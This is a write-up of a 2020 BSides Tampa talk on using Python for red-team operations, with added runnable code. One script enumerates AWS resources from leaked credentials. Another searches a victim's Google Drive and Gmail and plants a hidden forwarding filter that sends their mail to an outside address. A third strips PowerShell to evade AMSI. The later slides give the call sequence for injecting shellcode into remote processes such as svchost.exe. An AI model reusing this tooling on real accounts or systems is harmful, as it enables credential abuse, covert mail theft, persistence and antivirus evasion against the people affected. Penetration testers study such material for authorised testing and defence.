Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk focuses on the many ways a penetration tester or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful language that, above all else, lets a competent developer very quickly write new tools that start as a proof of concept and soon become an invaluable addition to the Red Teamer's tool-belt. Being able both to write new tools and to modify existing tools on the fly is critical to agility during a testing engagement. Everything from utility data processing, network protocol handling and API interaction to exploit development can be built rapidly thanks to Python's high level of functionality and intuitive nature.
2. Who are we?
• Mike Felch
• Vuln Research/Exploit Dev/Reverse Engineering
• Black Hills Information Security
• Established circa ‘99 in the lost underground
• Joff Thyer
• Security Researcher, Pen Tester, Developer
• Black Hills Information Security
• Certified SANS Instructor of SEC573 - Automating Infosec with Python
3. What are we covering?
• Attacking Cloud
• AWS
• Google
• Microsoft Azure
• Writing Malware
• Evasion
• Injection
• Execution
• Ways to weaponize
• Libraries
• Tooling/Frameworks
5. Attacking Cloud: Overview
• Infrastructure AND Services
• SaaS Platforms: O365 vs G Suite
• IaaS Platforms: AWS vs Azure vs Google
• Overlooked rich attack surfaces
• Customer: “We don’t use Azure, just O365”
• Pentesters: “.. but we need DA!”
• Developers: “Oops.. I checked in my .aws folder.”
• Major providers released an SDK/API
6. Attacking Cloud: Auth Flow
Standard Auth Flow
• Create a client (register your app with the provider)
• Need an authorization grant (the user's consent) before you can get a token
• Need an access token to reach resources
• Auth on behalf of the victim
• ….
• Profit!
7. Attacking Cloud: AWS
Boto 3: The AWS SDK for Python
• Client:
• Low-level AWS access
• Maps 1:1 to AWS services
• Most (all?) operations supported
• Resource/Sessions
• CRUD-like Operations
• Enumerate all the things..
• 219 services supported!
Resource: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/index.html
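The "Oops, I checked in my .aws folder" case from slide 5 is the natural place to see boto3's two interfaces side by side. The following is an added example written for this page, not code from the talk: it parses a leaked credentials file, then uses low-level clients (sts, s3, iam) and the ec2 Resource to enumerate what each profile can reach. The credentials text is constructed from AWS's documented example keys; the live part assumes boto3 is installed and the network is reachable.

```python
# Added example, not the talk's code: triage a checked-in .aws folder with boto3.
import configparser
from typing import Dict

# Constructed stand-in for a leaked ~/.aws/credentials (AWS's documented example keys).
LEAKED_CREDENTIALS = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[prod-deploy]
aws_access_key_id = AKIAI44QH8DHBEXAMPLE
aws_secret_access_key = je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
region = eu-west-1
"""


def parse_profiles(text: str) -> Dict[str, dict]:
    """Turn credentials-file text into boto3.Session keyword sets, one per profile."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    profiles = {}
    for name in cp.sections():
        sec = cp[name]
        if "aws_access_key_id" not in sec or "aws_secret_access_key" not in sec:
            continue  # e.g. a role-assuming profile with no static key of its own
        profiles[name] = {
            "aws_access_key_id": sec["aws_access_key_id"],
            "aws_secret_access_key": sec["aws_secret_access_key"],
            "aws_session_token": sec.get("aws_session_token"),
            # region normally lives in ~/.aws/config; fall back to us-east-1
            "region_name": sec.get("region", "us-east-1"),
        }
    return profiles


def enumerate_profile(session_kwargs: dict) -> dict:
    """Low-level clients for STS/S3/IAM plus the EC2 Resource for one key pair."""
    import boto3
    from botocore.exceptions import ClientError

    session = boto3.Session(**session_kwargs)
    report = {"buckets": [], "iam_users": [], "instances": [], "errors": {}}
    ident = session.client("sts").get_caller_identity()  # any valid key may call this
    report["account"], report["arn"] = ident["Account"], ident["Arn"]
    try:
        report["buckets"] = [b["Name"] for b in session.client("s3").list_buckets()["Buckets"]]
    except ClientError as e:
        report["errors"]["s3"] = e.response["Error"]["Code"]
    try:  # paginate: IAM truncates list_users at 100 by default
        for page in session.client("iam").get_paginator("list_users").paginate():
            report["iam_users"] += [u["UserName"] for u in page["Users"]]
    except ClientError as e:
        report["errors"]["iam"] = e.response["Error"]["Code"]
    try:  # Resource interface: a collection instead of a paged describe call
        ec2 = session.resource("ec2")
        report["instances"] = [(i.id, i.state["Name"], i.public_ip_address)
                               for i in ec2.instances.all()]
    except ClientError as e:
        report["errors"]["ec2"] = e.response["Error"]["Code"]
    return report


def triage(credentials_text: str) -> Dict[str, dict]:
    """Run the enumeration for every static-key profile found in the file."""
    return {name: enumerate_profile(kw) for name, kw in parse_profiles(credentials_text).items()}


if __name__ == "__main__":
    import json
    import pathlib
    text = pathlib.Path("~/.aws/credentials").expanduser().read_text()
    print(json.dumps(triage(text), indent=2, default=str))
```

Errors are recorded per service rather than aborting, because an AccessDenied on IAM is itself a finding (the key is valid but scoped), and because the sts call succeeding tells you the account and principal even when everything else is denied.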
11. Attacking Cloud: Google
• API Client: pip install oauth2client
• Requires registering your app
• Save the token.json
• Auth is easier with a logged-in web session
• Cache to credentials.json
• Search files, pilfer email, and add backdoors
• GMail, GDrive, Calendar, etc
• Compute SDK(s):
• https://cloud.google.com/python/setup
Resource: https://oauth2client.readthedocs.io/en/latest/
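The flow on this slide end to end, as an added example written for this page rather than code from the talk: cache-or-consent with oauth2client, then a Drive full-text search, a Gmail search, and the "add backdoors" step as a forwarding filter. oauth2client is the library the slide names; Google has since deprecated it in favour of google-auth, but the calls below are its documented API. The file names, scopes, query strings and forwarding address are my assumptions; the forwarding address must already be verified on the account or the filter is rejected.

```python
# Added example, not the talk's code: oauth2client consent flow, then Drive/Gmail pilfering.
from typing import Dict, List, Optional

CLIENT_SECRET_FILE = "client_secret.json"  # assumption: downloaded when registering the app
TOKEN_CACHE_FILE = "token.json"            # assumption: where oauth2client caches the user token
SCOPES = [
    "https://www.googleapis.com/auth/drive.readonly",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/gmail.settings.basic",  # needed to create filters
]


def _q(value: str) -> str:
    """Quote a value for a Drive query; backslashes and single quotes are escaped."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def drive_query(terms: List[str], mime_type: Optional[str] = None) -> str:
    """Drive v3 'q' expression: any of the terms in a file's text, not in the trash."""
    q = "(" + " or ".join("fullText contains " + _q(t) for t in terms) + ") and trashed = false"
    if mime_type:
        q += " and mimeType = " + _q(mime_type)
    return q


def gmail_forward_filter(query: str, forward_to: str, hide: bool = True) -> Dict:
    """Filter body forwarding every matching message; forward_to must be a verified address."""
    body = {"criteria": {"query": query}, "action": {"forward": forward_to}}
    if hide:
        body["action"]["removeLabelIds"] = ["INBOX", "UNREAD"]  # keep it out of the victim's view
    return body


def get_credentials():
    """Load the cached token, or run the consent flow once and cache the result."""
    from oauth2client import client, file, tools

    store = file.Storage(TOKEN_CACHE_FILE)
    creds = store.get()
    if creds is None or creds.invalid:
        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
        creds = tools.run_flow(flow, store)  # browser consent; result saved to TOKEN_CACHE_FILE
    return creds


def pilfer(creds, drive_terms: List[str], gmail_q: str, forward_to: Optional[str] = None) -> Dict:
    """Search Drive and Gmail; optionally plant a forwarding filter for the same query."""
    from googleapiclient.discovery import build
    from httplib2 import Http

    http = creds.authorize(Http())
    drive, gmail = build("drive", "v3", http=http), build("gmail", "v1", http=http)
    found: Dict = {"files": [], "messages": []}
    token = None
    while True:  # Drive results are paged
        resp = drive.files().list(q=drive_query(drive_terms), pageSize=100, pageToken=token,
                                  fields="nextPageToken, files(id, name, mimeType, webViewLink)").execute()
        found["files"] += resp.get("files", [])
        token = resp.get("nextPageToken")
        if not token:
            break
    resp = gmail.users().messages().list(userId="me", q=gmail_q, maxResults=100).execute()
    for m in resp.get("messages", []):
        msg = gmail.users().messages().get(userId="me", id=m["id"], format="metadata",
                                           metadataHeaders=["From", "Subject"]).execute()
        hdrs = {h["name"]: h["value"] for h in msg["payload"]["headers"]}
        found["messages"].append((hdrs.get("From"), hdrs.get("Subject")))
    if forward_to:  # the "add backdoors" step
        found["filter"] = gmail.users().settings().filters().create(
            userId="me", body=gmail_forward_filter(gmail_q, forward_to)).execute()
    return found


if __name__ == "__main__":
    creds = get_credentials()
    print(pilfer(creds, ["password", "vpn"], "subject:(password OR vpn) newer_than:1y"))
```

The filter persists after the token is revoked, which is what makes it a backdoor rather than just access; the same settings endpoint is also where a defender should look when auditing a compromised mailbox.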
18. Writing Python Malware
● Evasion
○ Evading AMSI: Stripping PowerShell
● Injection
○ Injecting shellcode with custom Python
● Execution
○ Creating an EXE from a Python script
19. 1) Evading AMSI: PowerStrip.py
● PowerShell detection by Anti-Malware Scan Interface (AMSI)
● Can be suboptimal and annoying on a test
● Evasion?
○ Invoke-Obfuscation by Daniel Bohannon is amazing
○ But… you really don’t have to go that far.
20. PowerStrip.py
● What if we just stripped comments and changed a few cmdlet names? No really… not kidding.
● https://github.com/yoda66/PowerStrip
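To make the idea concrete, here is an added Python illustration written for this page (not the code from the PowerStrip repository linked above): it drops both PowerShell comment forms and applies a rename table to cmdlet and variable names while leaving string literals untouched, since a '#' inside a string is not a comment. The sample script and the rename table are constructed.

```python
# Added illustration, not PowerStrip's code: strip PowerShell comments and rename identifiers.
import re
from typing import Dict, Optional

# Constructed sample: both comment kinds, plus '#' and escaped quotes inside strings.
SAMPLE = """# Loads the payload
function Invoke-Evil {  # entry point
    <# block
       comment #>
    $Payload = 'keep # this'
    Write-Host "and `"this`" # too"
    Invoke-Evil2 $Payload
}
"""


def _rename(code: str, renames: Dict[str, str]) -> str:
    # PowerShell names contain '-', so a plain \b would split Invoke-Evil in two.
    for old, new in renames.items():
        code = re.sub(r"(?<![\w-])" + re.escape(old) + r"(?![\w-])",
                      lambda _m, new=new: new, code)
    return code


def strip_powershell(script: str, renames: Optional[Dict[str, str]] = None) -> str:
    """Return script minus '#' line comments, <# #> block comments and blank lines,
    with `renames` applied only to code outside string literals."""
    out, i, n = [], 0, len(script)
    while i < n:
        if script.startswith("<#", i):                    # block comment
            end = script.find("#>", i + 2)
            i = n if end < 0 else end + 2
        elif script[i] == "#":                            # line comment; keep the newline
            end = script.find("\n", i)
            i = n if end < 0 else end
        elif script[i] in "'\"":                          # string literal: copy verbatim
            quote, j = script[i], i + 1
            while j < n:
                if quote == '"' and script[j] == "`":     # backtick escape (double-quoted only)
                    j += 2
                elif script[j] == quote:
                    if script.startswith(quote, j + 1):   # doubled quote is an escape
                        j += 2
                    else:
                        break
                else:
                    j += 1
            out.append(script[i:j + 1])
            i = j + 1
        else:                                             # code up to the next special char
            j = i
            while j < n and script[j] not in "#'\"" and not script.startswith("<#", j):
                j += 1
            chunk = script[i:j]
            out.append(_rename(chunk, renames) if renames else chunk)
            i = j
    lines = [ln.rstrip() for ln in "".join(out).split("\n") if ln.strip()]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(strip_powershell(SAMPLE, {"Invoke-Evil": "Get-Report", "$Payload": "$data"}))
```

This deliberately stops short of PowerShell's full grammar (here-strings, `@"…"@`, are not recognised, and renaming a name that is also built dynamically from a string will break the script), so diff the output against the original and run it before relying on it. The point stands: nothing here is obfuscation, just a different byte sequence for the signature to miss.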
26. 2) Python Malware
● Python can call functions in the Windows kernel32 DLL through the “ctypes” module
○ Setting up the correct kernel32 prototypes (argument and return types) is a painstaking process.
● You can leverage this to run a shellcode of choice.
○ msfvenom, or cobalt strike generated shellcode for example.
● There are a huge number of different process injection techniques.
● There is a lot of BAD code floating around the Internet.
27. Steps for shellcode injection
● Three fundamental steps, whether you are creating a thread locally or in a remote process
○ Allocate Memory
○ Copy Shellcode to allocated memory
○ Create a running thread of code
● Notes:
○ We will not be using DLL injection, which typically means making the target call LoadLibraryA() on a DLL sitting on disk (nor its reflective variant, which avoids the disk by carrying its own loader).
○ Remote process injection requires opening a remote process handle
○ We will not address “Process Hollowing” either.
28. Injection: Memory Allocation
● Limited number of choices of kernel32 API call
○ VirtualAlloc()
■ allocate memory within same process
○ VirtualAllocEx()
■ allocate memory in a remote process
○ HeapCreate() then HeapAlloc()
■ allocate memory from heap within same process
29. Injection: Copy shellcode
● Two basic choices
○ RtlMoveMemory()
■ for local in-process activity
○ WriteProcessMemory()
■ for remote process activity
● Note: under Python3, handing ctypes the payload as a str instead of bytes, or copying from a NUL-terminated string view of it, truncates the payload at the first NULL “x00” byte; the bytes must be passed with an explicit length.
○ This nearly drove me nuts. As much as I hate to say it, use Python2 for now.
○ Alternative: Encode your shellcode but this has ramifications
30. Injection: Starting Thread
● Three possibilities
○ CreateThread()
■ in local process only
○ CreateRemoteThread()
■ in remote process
○ QueueUserAPC()
■ in a remote process; needs a handle to one of its threads, and the APC only runs when that thread enters an alertable wait
■ interesting variant...
31. Matching API Arg Types
● If you don’t do this, ctypes assumes every argument and return value is a C int, which truncates 64-bit pointers and handles, and you will fail.
○ Make sure to use “from ctypes.wintypes import DWORD, HANDLE … “
○ This example is part of a Python class. (yes, I learned the hard way)
33. Remote Process Injection
● You first need to find a process!
● Python “psutil” module is helpful and well… “svchost.exe”
34. Remote Process Injection Steps
● OpenProcess() - open the remote process handle
● VirtualAllocEx() - allocate memory within process
● WriteProcessMemory() - write shellcode to memory
● VirtualProtectEx() - change protection to PAGE_EXECUTE_READ (RX only)
● CreateRemoteThread() - spin up a thread in the remote process
● VirtualFreeEx() - free the virtual memory (only once the thread is done with it)
● CloseHandle() - close remote process handle
35. 3) Create EXE from Script
● A number of different methods
○ PyInstaller
○ py2exe
○ Possibly IronPython but its maintenance is lagging
● Pyinstaller install with “pip2” for Python2
C:> pip2 install pyinstaller
C:> pyinstaller.exe --onefile scriptname.py
● Resulting EXE will be within “dist” directory.